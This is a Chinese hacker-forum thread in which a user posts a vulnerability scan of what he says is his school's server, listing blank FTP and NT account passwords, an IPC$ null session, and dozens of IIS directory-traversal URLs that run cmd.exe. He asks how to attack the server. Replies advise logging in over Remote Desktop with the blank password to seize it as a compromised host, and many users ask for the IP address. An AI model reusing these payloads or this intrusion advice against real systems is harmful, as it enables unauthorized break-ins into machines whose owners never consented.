20CN网络安全小组论坛 - 菜鸟乐园

论坛: 菜鸟乐园标题: 有这些漏洞......

作者: bcliangzi [bcliangzi]

论坛用户

[xx xx xx xx]: 正在检测"开放端口" ...
[xx xx xx xx]: 端口13开放: Daytime
[xx xx xx xx]: 端口17开放: Quote of the Day
[xx xx xx xx]: 端口21开放: FTP (Control)
[xx xx xx xx]: 端口23开放: Telnet
[xx xx xx xx]: 端口25开放: SMTP, Simple Mail Transfer Protocol
[xx xx xx xx]: 端口19开放: Character Generator
[xx xx xx xx]: 端口80开放: HTTP, World Wide Web
[xx xx xx xx]: 端口7开放: Echo
[xx xx xx xx]: 端口9开放: Discard
[xx xx xx xx]: 端口42开放: Host Name Server
[xx xx xx xx]: 端口53开放: domain, Domain Name Server
[xx xx xx xx]: 端口135开放: Location Service
[xx xx xx xx]: 端口139开放: NETBIOS Session Service
[xx xx xx xx]: 端口443开放: HttpS, Secure HTTP
[xx xx xx xx]: 端口3389开放: Windows 2000 remote admin
[xx xx xx xx]: "开放端口"扫描完成, 发现 15.
[xx xx xx xx]: 正在检测"Snmp信息" ...
[xx xx xx xx]: 发现 Snmp口令: public
[xx xx xx xx]: 获取Snmp信息"Snmp系统信息"完成
[xx xx xx xx]: 发现 "Snmp信息".
[xx xx xx xx]: 正在检测"SSL漏洞" ...
[xx xx xx xx]: "SSL漏洞"扫描完成.
[xx xx xx xx]: 正在检测"RPC漏洞" ...
[xx xx xx xx]: 无法与主机"xx xx xx xx"建立连接
[xx xx xx xx]: "RPC漏洞"扫描完成.
[xx xx xx xx]: 正在检测"SQL-Server弱口令" ...
[xx xx xx xx]: 无法与主机"xx xx xx xx"建立连接
[xx xx xx xx]: "SQL-Server弱口令"扫描完成.
[xx xx xx xx]: 正在检测"FTP弱口令" ...
[xx xx xx xx]: 发现 FTP弱口令: ftp/[空口令]
[xx xx xx xx]: "FTP弱口令"扫描完成, 发现 1.
[xx xx xx xx]: 正在检测"NT-Server弱口令" ...
[xx xx xx xx]: 发现 NT-Server弱口令: yuanda/[空口令]
[xx xx xx xx]: "NT-Server弱口令"扫描完成, 发现 1.
[xx xx xx xx]: 正在检测"NetBios信息" ...
[xx xx xx xx]: 获取Netbios信息"远程注册表信息"完成
[xx xx xx xx]: 建立IPC$空会话成功
[xx xx xx xx]: 获取Netbios信息"服务器信息"完成
[xx xx xx xx]: 获取Netbios信息"服务器时间"完成
[xx xx xx xx]: 获取Netbios信息"主域控制器名称"完成
[xx xx xx xx]: 获取Netbios信息"网络传输列表"完成
[xx xx xx xx]: 获取Netbios信息"网络会话列表"完成
[xx xx xx xx]: 获取Netbios信息"网络服务器列表"完成
[xx xx xx xx]: 获取Netbios信息"网络磁盘列表"完成
[xx xx xx xx]: 获取Netbios信息"网络共享资源列表"完成
[xx xx xx xx]: 获取Netbios信息"网络用户列表"完成
[xx xx xx xx]: 获取Netbios信息"本地组列表"完成
[xx xx xx xx]: 获取Netbios信息"组列表"完成
[xx xx xx xx]: 获取Netbios信息"网络文件列表"完成
[xx xx xx xx]: 获取Netbios信息"网络映射列表"完成
[xx xx xx xx]: 获取Netbios信息"服务统计"完成
[xx xx xx xx]: 获取Netbios信息"计划任务列表"完成
[xx xx xx xx]: IPC$会话已结束
[xx xx xx xx]: 发现 "NetBios信息".
[xx xx xx xx]: 正在检测"SMTP漏洞" ...
[xx xx xx xx]: "SMTP漏洞"扫描完成.
[xx xx xx xx]: 正在检测"POP3弱口令" ...
[xx xx xx xx]: 无法与主机"xx xx xx xx"建立连接
[xx xx xx xx]: "POP3弱口令"扫描完成.
[xx xx xx xx]: 正在检测"CGI漏洞" ...
[xx xx xx xx]: 正在检测"HTTP重定向错误页面" ...
[xx xx xx xx]: 正在检测"CGI漏洞" ...
[xx xx xx xx]: 发现 CGI漏洞: /scripts/samples/search/qsumrhit.htw
[xx xx xx xx]: 发现 CGI漏洞: /scripts/samples/search/qfullhit.htw
[xx xx xx xx]: 发现 CGI漏洞: /null.ida
[xx xx xx xx]: 发现 CGI漏洞: /null.idq
[xx xx xx xx]: 发现 CGI漏洞: /abczxv.htw
[xx xx xx xx]: 发现 CGI漏洞: /_vti_inf.html
[xx xx xx xx]: 发现 CGI漏洞: /_vti_bin/shtml.dll/_vti_rpc
[xx xx xx xx]: 发现 CGI漏洞: /_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1
[xx xx xx xx]: 发现 CGI漏洞: /_vti_bin/shtml.dll/nosuch.htm
[xx xx xx xx]: 发现 CGI漏洞: /_vti_bin/shtml.exe
[xx xx xx xx]: 发现 CGI漏洞: /_vti_bin/shtml.dll
[xx xx xx xx]: "CGI漏洞"扫描完成, 发现 11.
[xx xx xx xx]: 正在检测"IIS漏洞" ...
[xx xx xx xx]: 正在检测"HTTP重定向错误页面" ...
[xx xx xx xx]: 正在检测"IIS漏洞" ...
[xx xx xx xx]: 发现 IIS漏洞: /_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
[xx xx xx xx]: 发现 IIS漏洞: /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\
[xx xx xx xx]: 发现 IIS漏洞: /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\
[xx xx xx xx]: 发现 IIS漏洞: /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\
[xx xx xx xx]: 发现 IIS漏洞: /_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /PBServer/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /Rpc/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir
[xx xx xx xx]: 发现 IIS漏洞: /scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\
[xx xx xx xx]: 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞
[xx xx xx xx]: 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida)
[xx xx xx xx]: 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq)
[xx xx xx xx]: "IIS漏洞"扫描完成, 发现 47.
[xx xx xx xx]: 正在检测"BIND漏洞" ...
[xx xx xx xx]: 可能存在"DNS Support IQUERY"漏洞
[xx xx xx xx]: "BIND漏洞"扫描完成, 发现 1.
[xx xx xx xx]: 正在检测"Finger漏洞" ...
[xx xx xx xx]: "Finger漏洞"扫描完成.
[xx xx xx xx]: 正在检测"Sygate漏洞" ...
[xx xx xx xx]: "Sygate漏洞"扫描完成.
[xx xx xx xx]: 扫描全部完成.
――――――――――――――――――――――――+++――――
请问这些消息中有很多漏洞，该可一怎样的攻击呀？

地主发表时间: 07/27 21:14

回复: all528 [all528]

论坛用户

最简单的方法
[xx xx xx xx]: 端口3389开放: Windows 2000 remote admin
[xx xx xx xx]: 发现 NT-Server弱口令: yuanda/[空口令]
还用攻击吗这就是肉鸡

B1层发表时间: 07/28 17:31

回复: hacker521 [hacker521]

论坛用户

晕死，你从哪扫到的，为什么俺就没有你那么走运，不公平呀

B2层发表时间: 07/28 17:41

回复: bcliangzi [bcliangzi]

论坛用户

哎，运气！！！

B3层发表时间: 07/28 17:53

回复: fu414 [fu414]

论坛用户

晕死了，我口水都流了，哪个网段的？

B4层发表时间: 07/28 18:07

回复: tianyecool [tianyecool]

论坛用户

爽啊

B5层发表时间: 07/28 18:11

回复: junjuntop [junjuntop]

论坛用户

针对3389
国内最多！

B6层发表时间: 07/28 21:24

回复: maomao520 [maomao520]

论坛用户

呵呵
对了你扫描的ip 地址是多少，告诉大家一起来玩玩呀！

B7层发表时间: 07/28 21:51

回复: studio [studio]

论坛用户

你把ip公布出来啊！

B8层发表时间: 07/28 22:12

回复: hrbbjx [hrbbjx]

论坛用户

好运呀,我可从来没有见过的,分享一下了

B9层发表时间: 07/28 22:31

回复: wjccn [wjccn]

论坛用户

光看这些iis漏洞，
　这台主机死定了
　　呵呵～

B10层发表时间: 07/29 01:08

回复: bcliangzi [bcliangzi]

论坛用户

哈哈，不好意思，这是我们学校的机子，恕不能奉！！！

B11层发表时间: 07/29 10:55

回复: hacker521 [hacker521]

论坛用户

不能在论坛上公布肉鸡地址，不然我删帖，要不就给我留言，告诉我一个人就行了，呵呵

B12层发表时间: 07/29 10:56

回复: max_ax [max_ax]

论坛用户

你好自私啊！！
给我一个我也试试啊

B13层发表时间: 07/29 12:19

回复: nothing [eson]

论坛用户

haha....

B14层发表时间: 07/29 12:52

回复: jhnyjhny [jhnyjhny]

论坛用户

我相信这可能都打过补丁的
我不相信还有这么笨的管理员

B15层发表时间: 07/29 13:30

回复: hacker521 [hacker521]

论坛用户

可能是一个蜜罐呀，不如不要搞了，留给我吧，我不怕死，呵呵

B16层发表时间: 07/30 07:26

回复: catmi [catmi]

版主

女士优先~~

B17层发表时间: 07/30 09:37

回复: all528 [all528]

论坛用户

无风啊不如开个专区专门放几个肉鸡给大家练习（国内的删小日本的最好怎么样啊)

B18层发表时间: 07/30 09:41

回复: wsmat [wsmat]

论坛用户

我是菜鸟哦。快给个肉鸡。。。。。让我练习一下

B19层发表时间: 07/30 10:52

回复: bcliangzi [bcliangzi]

论坛用户

不能给呀，引狼入室可不干！！！！哈哈，你们慢慢找呀，还是有的。

B20层发表时间: 07/30 11:05

回复: ycjzg [ycjzg]

论坛用户

我是看出来了，楼主把大家玩了，要是真有那样一个管理员，拉出去....

B21层发表时间: 07/30 11:27

回复: bcliangzi [bcliangzi]

论坛用户

没有没有呀，这位老兄，别乱说。我可是正儿八紧来求教的，那会来耍人呀，只是这原则问题不能忘呀！哈哈。

B22层发表时间: 07/30 11:34

回复: all528 [all528]

论坛用户

笨没看到我上面的帖子吗肉鸡就是肉你为什么还要肉里找肉啊

B23层发表时间: 07/30 11:46

回复: hacker521 [hacker521]

论坛用户

没有肉就找菜鸡吧

B24层发表时间: 07/30 17:15

回复: dsh [dsh]

论坛用户

好肥的一块肉呀
把我们这群菜鸟可搀坏了呀――――――――
55555555555555555555555555555555
我也想要！！

B25层发表时间: 07/30 17:50

回复: xiaomayi [xiaomayi]

论坛用户

ip可否告诉我!~~~

B26层发表时间: 07/30 19:59

回复: hcz [hcz]

论坛用户

上面的是假的，是你的扫描工具有问题

B27层发表时间: 07/31 01:23

回复: hacker521 [hacker521]

论坛用户

你就知道是假的，我还说是真的，你信不信，我前个月还利用输入法漏洞入侵了一台远程主机，国人的安全意识真是太差了，我都不想讲了，免的伤心

B28层发表时间: 07/31 07:39

回复: tianyecool [tianyecool]

论坛用户

呵呵,有同感~!我随便找了漏洞机器就进去了

B29层发表时间: 07/31 08:27

回复: bcliangzi [bcliangzi]

论坛用户

这不是假的呀，怎么就见得是假的呢？现在的人安全意识是很差，还有人的密码用1234567之类的呢.喜多人,特别是有些有钱的家伙,设备精良,但却狗屁不通,对安全的认识更是少之又少,其实这已不只是那些人的问题了,而基本上国人的问题了!!!

B30层发表时间: 07/31 10:33

回复: sgpeng [sgpeng]

论坛用户

什么真真假假啊！我都要！！哈哈

B31层发表时间: 07/31 11:21

回复: tianyecool [tianyecool]

论坛用户

小心掉进蜜罐里了

B32层发表时间: 07/31 12:04

回复: wolfjin [wolfjin]

论坛用户

估计里面已经是黑窝了，肯定不止你一个，告诉我吧，，我帮你把他们打发了

B33层发表时间: 08/01 11:59

回复: yimarong [yimarong]

版主

告诉ＩＰ啊　！

别是密罐哦！

B34层发表时间: 08/01 14:56

回复: hacker521 [hacker521]

论坛用户

我都说不准了,上面不是写的很明白吗?写出来就删帖

B35层发表时间: 08/01 17:17

回复: qwhjl [qwhjl]

论坛用户

其实~~呃……这台机子是我的。

[此贴被 qwhjl(qwhjl) 在 08月01日19时27分编辑过]

B36层发表时间: 08/01 19:50

回复: lzlr1324 [lzlr1324]

论坛用户

晕倒！这个管理员是白痴吗？

B37层发表时间: 08/01 22:46

回复: bcliangzi [bcliangzi]

论坛用户

唉！！没办法，还好我给不了些了，基本上不是肉鸡了，哈哈。

B38层发表时间: 08/02 09:06

回复: mingming8 [mingming8]

论坛用户

晕~！~！
管理员是干什么的。

B39层发表时间: 08/02 12:03

回复: burningice [burningice]

论坛用户

应有尽有

B40层发表时间: 08/02 12:52

回复: hacker521 [hacker521]

论坛用户

如果他是个管理员，现在可能已经被开除了

B41层发表时间: 08/02 17:30

回复: all528 [all528]

论坛用户

不要那么说 “如果他是个管理员就一定是个为他人找想的管理员”。
名言啊用笔记下来

B42层发表时间: 08/03 12:19

回复: hacker521 [hacker521]

论坛用户

哈哈对，我一定记下来

B43层发表时间: 08/03 17:42

回复: kuangbiao [kuangbiao]

论坛用户

斑竹就让我门试试撒
听大哥门说有了肉鸡
我们菜鸟进步就会更快拉~~
这样我们才能早日为国家效力嘛~
谢谢斑竹拉 ~

B44层发表时间: 08/03 18:08

回复: jacky8714 [jacky8714]

论坛用户

呵呵，看完了觉得好象觉得是一个屋子周围到处都是破的，随便就可以进去

B45层发表时间: 08/04 17:26

回复: tony82yyf [tony82yyf]

论坛用户

好大一只鸡啊
流口水ing

B46层发表时间: 08/04 17:43

回复: hitler007 [hitler007]

论坛用户

我都快流干了：）

B47层发表时间: 08/04 18:02

回复: yangguo [yangguo]

论坛用户

那台机是我的试验机~~~~~~~~~~

B48层发表时间: 08/04 23:48

论坛: 菜鸟乐园